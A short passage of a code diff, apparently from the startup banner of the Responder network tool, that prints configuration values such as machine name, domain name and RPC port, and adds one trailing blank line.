 	print('    %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled))
 	print('')
 
@@ -428,3 +430,4 @@ def StartupMessage():
 	print('    %-27s' % "Responder Machine Name" + color('[%s]' % settings.Config.MachineName, 5, 1))
 	print('    %-27s' % "Responder Domain Name" + color('[%s]' % settings.Config.DomainName, 5, 1))
 	print('    %-27s' % "Responder DCE-RPC Port " + color('[%s]' % settings.Config.RPCPort, 5, 1))
+